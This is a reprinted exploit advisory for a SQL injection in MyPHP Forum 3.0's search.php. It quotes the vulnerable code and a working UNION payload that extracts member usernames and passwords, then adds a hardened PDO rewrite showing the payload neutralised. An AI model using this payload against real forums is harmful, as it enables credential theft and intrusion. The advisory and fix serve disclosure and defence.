MyPHP Forum <= 3.0 (Final) Remote SQL Injection Attack

MyPHP Forum v3.0 (Final), and possibly earlier versions: multiple SQL injection vulnerabilities (works with magic_quotes off or on)

Affected code: search.php, starting at line 14:

[code lang="php"]
if($_POST['submit']) {
	// Both values come straight from the POST body and are never escaped or quoted safely
	$searchtext = $_POST['searchtext'];
	$searchuser = $_POST['searchuser'];

	if(!strstr($searchtext, '"')) {
		$keywords = explode(" ", $searchtext);
		for($i = 0; $i < count($keywords); $i++) {
			if($sqladdon != "") {
				$sqladdon .= " AND p.message LIKE '%$keywords[$i]%'";
			} else {
				$sqladdon .= "p.message LIKE '%$keywords[$i]%'";
			}
		}
	} else {
		// stripslashes() undoes magic_quotes, so quoted input is injectable even with it enabled
		$phrase = trim(stripslashes(strstr($searchtext, '"')));
		$quotesarr = explode('"', $phrase);
		$quotes = count($quotesarr);
		$phrasecount = $quotes - (count(explode('" "', $phrase)) + 1);

		for($i = 0; $i < $quotes; $i++) {
			if($i != 0 && $i != $quotes - 1) {
				if($phraseoff != "yes") {
					$phraselist .= "$quotesarr[$i]|";
					$phraseoff = "yes";
				} else {
					$phraseoff = "no";
				}
			}
		}

		$phrasearr = explode("|", $phraselist);
		$phrases = count($phrasearr) - 1;

		for($i = 0; $i < $phrases; $i++) {
			if($sqladdon != "") {
				$sqladdon .= " AND p.message LIKE '%$phrasearr[$i]%'";
			} else {
				$sqladdon .= "p.message LIKE '%$phrasearr[$i]%'";
			}
		}
		
		$newsearchtxt = trim(str_replace("$phrase", "", stripslashes($searchtext)));

		if($newsearchtxt != "") {
			$keywords = explode(" ", $newsearchtxt);
		}

		for($i = 0; $i < count($keywords); $i++) {
			if($sqladdon != "") {
				$sqladdon .= " AND p.message LIKE '%$keywords[$i]%'";
			} else {
				$sqladdon .= "p.message LIKE '%$keywords[$i]%'";
			}
		}
	}

	if($searchuser != "") {
		if($sqladdon != "") {
				$sqladdon .= " AND p.author LIKE '%$searchuser%'";
			} else {
				$sqladdon .= "p.author LIKE '%$searchuser%'";
			}
	}

	if($sqladdon != "" ) {
		search_header();
		$ttnum = 1;		// Now the Vulnerable Query =)
		// $sqladdon is concatenated into the statement; mysql_error() also leaks query errors to the client
		$query = mysql_query("SELECT t.*, f.name AS forum FROM $db_post p, $db_topic t, $db_forum f WHERE $sqladdon AND t.tid=p.tid AND f.fid=t.fid") or die(mysql_error());
[/code]

POST body:

[code lang="php"]submit=Search&searchtext=%'/**/UNION/**/SELECT/**/0,0,0,concat('<BR/><h3>-=ParadoxGotThisOne=-</h3><BR/><h4>Username:',username,'<BR/>Password:',password,'</h4>'),0,0,0,0,0,0/**/FROM/**/[Prefix]_member/**/WHERE/**/uid=[Id]/*"
[/code]

Note: the trailing double quote must be included!
Affected version: MyPHP Forum v3.0
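For comparison, the following is an added hardened rewrite of the search builder from search.php above. It is example code written for this page, not code from the MyPHP Forum project. It keeps the same behaviour (quoted phrases and space-separated words each become a LIKE condition on p.message, plus an optional p.author filter) but binds every user value through a PDO prepared statement and escapes the LIKE metacharacters `%` and `_` so input is matched literally. Table names `post`, `topic`, `forum` and `member`, the SQLite in-memory database and the sample rows are constructed for the demonstration; the real forum uses prefixed names from `$db_post`, `$db_topic` and `$db_forum`.

```php
<?php
// Hardened rewrite of the MyPHP Forum search builder (example code, not the project's own).
// Runs offline against an in-memory SQLite database; the SQL is portable to MySQL.

// Escape LIKE metacharacters so user text matches literally. '!' is declared as the
// ESCAPE character in the query, so '!' itself must be escaped first.
function likeLiteral(string $s): string {
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $s);
}

// Returns [sql, params] or [null, []] when there is nothing to search for.
function buildSearch(string $searchtext, string $searchuser): array {
    $terms = [];
    // Double-quoted phrases are single terms; whatever remains is split on whitespace.
    if (preg_match_all('/"([^"]*)"/', $searchtext, $m)) {
        foreach ($m[1] as $phrase) {
            if (trim($phrase) !== '') {
                $terms[] = trim($phrase);
            }
        }
        $searchtext = preg_replace('/"[^"]*"/', ' ', $searchtext);
    }
    foreach (preg_split('/\s+/', trim($searchtext), -1, PREG_SPLIT_NO_EMPTY) as $word) {
        $terms[] = $word;
    }

    $where  = [];
    $params = [];
    foreach ($terms as $t) {
        $where[]  = "p.message LIKE ? ESCAPE '!'";
        $params[] = '%' . likeLiteral($t) . '%';
    }
    if ($searchuser !== '') {
        $where[]  = "p.author LIKE ? ESCAPE '!'";
        $params[] = '%' . likeLiteral($searchuser) . '%';
    }
    if (!$where) {
        return [null, []];
    }
    // Only fixed SQL text is concatenated; every user value travels as a bound parameter.
    $sql = "SELECT t.*, f.name AS forum FROM post p, topic t, forum f WHERE "
         . implode(' AND ', $where) . " AND t.tid = p.tid AND f.fid = t.fid";
    return [$sql, $params];
}

function runSearch(PDO $db, string $searchtext, string $searchuser): array {
    [$sql, $params] = buildSearch($searchtext, $searchuser);
    if ($sql === null) {
        return [];
    }
    $st = $db->prepare($sql);
    $st->execute($params);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample schema and rows (hypothetical, not the forum's real schema).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE forum  (fid INTEGER, name TEXT)");
$db->exec("CREATE TABLE topic  (tid INTEGER, fid INTEGER, title TEXT)");
$db->exec("CREATE TABLE post   (pid INTEGER, tid INTEGER, author TEXT, message TEXT)");
$db->exec("CREATE TABLE member (uid INTEGER, username TEXT, password TEXT)");
$db->exec("INSERT INTO forum  VALUES (1, 'General')");
$db->exec("INSERT INTO topic  VALUES (10, 1, 'Hello')");
$db->exec("INSERT INTO post   VALUES (100, 10, 'alice', 'hello world 100% done')");
$db->exec("INSERT INTO member VALUES (1, 'admin', 'constructed-hash')");

// A normal search: the quoted phrase contains a literal '%' and still matches correctly.
print_r(runSearch($db, 'hello "world 100%"', ''));

// The advisory's payload shape (shortened) is now just a pattern string bound to '?'.
$payload = "%'/**/UNION/**/SELECT/**/0,0,0,username,0,0,0,0,0,0/**/FROM/**/member/**/WHERE/**/uid=1/*";
print_r(runSearch($db, $payload, ''));
```

Because the payload is passed as a bound parameter it never reaches the SQL parser as syntax, so the UNION is simply a literal that no message contains and the member table is never touched; the `ESCAPE '!'` clause also stops a user-supplied `%` or `_` from widening the match. The same change applies to the `p.author` condition, which the original concatenates just as unsafely.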


Creative Commons license: created by CFC4N of 莿鸟栖草堂 and licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 (Unported) license. Based on a work at http://www.cnxct.com. When reprinting, please credit: MyPHP Forum <= 3.0 (Final) Remote SQL Injection Attack
